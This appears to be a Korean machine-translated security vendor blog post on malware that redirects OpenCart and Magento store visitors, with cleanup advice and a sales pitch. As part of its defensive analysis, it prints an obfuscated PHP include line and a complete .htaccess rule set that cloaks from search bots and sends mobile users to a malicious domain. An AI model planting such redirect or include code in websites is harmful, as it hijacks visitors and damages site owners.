데스크톱 및 모바일 웹사이트를 악성 링크로 리디렉션하는 OpenCart 및 Magento 악성코드가 계속해서 발생하고 있습니다. 지난주부터 우리는 이 맬웨어의 여러 사례를 접했습니다. Magento 및 OpenCart의 다양한 버전에서 이 감염을 보았기 때문에 표적이 되는 특정 버전은 없습니다.
또한 다양한 악성 리디렉션 유형과 해결 방법에 대한 자세한 블로그 게시물을 확인하세요.
감염은 어떻게 보나요?
블랙프라이데이 및 사이버먼데이 판매를 앞두고 이 악성코드는 감염된 웹사이트를 방문하는 모든 사람을 일부 제안이 포함된 웹사이트로 리디렉션합니다. 리디렉션되는 웹 사이트에는 포르노처럼 보이는 웹 사이트의 일부 제안이나 그래픽 콘텐츠가 있습니다. 우리를 찾아온 고객 중 한 명이 데스크톱 웹사이트에서 멀웨어의 일부를 제거했지만 모바일에서는 여전히 남아 있습니다. 웹사이트. 경우에 따라 리디렉션은 Google 검색을 통해서만 발생합니다(Google에서 사이트를 검색한 다음 링크를 클릭하는 경우). 그것은 주로 검색 엔진 봇을 속여서 SEO에 나쁜 영향을 미치기 때문입니다. 감염된 웹사이트를 리디렉션하는 이 OpenCart 및 Magento 맬웨어의 모습은 다음과 같습니다.
리디렉션 맬웨어의 결과:
- 악의적인 웹사이트로 리디렉션
- 검색 결과에 부정적인 영향
- 404페이지 생성 증가
- Google 웹마스터의 오류
- 서버의 악성 파일 증가
- 무엇보다도 트래픽 및 매출 감소
이 OpenCart 및 멀웨어 웹사이트 리디렉션 스팸을 찾고 수정하는 방법:
아래 단계는 일부 코드를 삭제하도록 조언할 수 있습니다. 그러나 때때로 해커가 악성 코드를 합법적인 것처럼 보이게 만듭니다. 하나. 따라서 파일이나 코드를 삭제하기 전에 백업을 수행하는 것이 좋습니다. 다음은 찾아서 수정하는 단계입니다.
- index.php 파일 확인: 인덱스 파일에 포함된 악성코드를 발견했습니다. 코드의 악의적인 부분은 인코딩되어 있으며 디코딩하지 않고는 무엇을 하는지 알기 어렵습니다. 다음은 스니펫입니다.
<?php /*2e920*/ @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]"; /*2e920*/ // Version define('VERSION', '2.0.1.0'); // Configuration if (is_file('config.php')) { require_once('config.php'); } // Install if (!defined('DIR_APPLICATION')) { header('Location: install/index.php'); exit; } // Startup require_once(DIR_SYSTEM . 'startup.php'); // Registry $registry = new Registry();색인 파일 상단에서 이 코드 조각을 찾으면 삭제하는 것이 좋습니다.
- .htaccess를 확인하십시오. 멀웨어의 또 다른 인스턴스는 서버의 .htaccess 파일에서 찾을 수 있습니다. 루트 폴더의 .htaccess와 /admin 폴더도 확인하십시오. /admin 폴더에서 발견된 멀웨어에서 발췌:
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR] RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR] RewriteCond %{HTTP:Profile} .+ [NC,OR] RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR] RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC] RewriteCond %{QUERY_STRING} !noredirect [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC] RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC] RewriteRule ^(.*)$ https://sswim.ru [L,R=302].htaccess 파일에 있는 이 모든 코드는 악성입니다. 이 코드는 모바일 장치를 악성 도메인으로 리디렉션합니다. 이 코드를 찾으면 즉시 제거해야 합니다.
- 비린내 나는 PHP 파일 찾기: 이것은 까다로운 부분입니다. 해커는 일반적으로 파일 이름을 매우 합법적으로 보이는 파일로 지정하고 악성 코드를 삽입하는 경향이 있습니다. 때때로 이러한 합법적인 파일의 많은 코드는 해롭지 않지만 해커를 위해 작동하는 몇 줄이 있습니다. 이 특별한 경우에 enjoy.php와 같은 파일을 찾았습니다. &압축 해제.php 다양한 OpenCart/Magento 디렉토리에 있습니다.
여기에서 할 수 있는 작업은 다음과 같습니다.
이와 같은 감염은 귀하의 비즈니스에 큰 타격을 줍니다. 가동 중지 시간마다 고객, 평판 및 가장 중요한 검색 엔진 순위에 대한 나쁜 영향을 잃습니다. . 웹사이트를 감염시킨 해커는 기술에 정통한 사람들도 탐지하기 어려운 백도어를 남기는 경향이 있습니다. 이러한 해킹으로부터 교훈을 얻고 웹사이트를 24x7x365 보호하는 웹사이트 방화벽을 사용하는 것이 중요합니다!
지금은 이 문제를 해결하는 데 도움이 필요하면 기꺼이 도와드리겠습니다. 여기에서 가입하세요. 저희 엔지니어가 가입 후 10분 이내에 정리 프로세스를 시작합니다.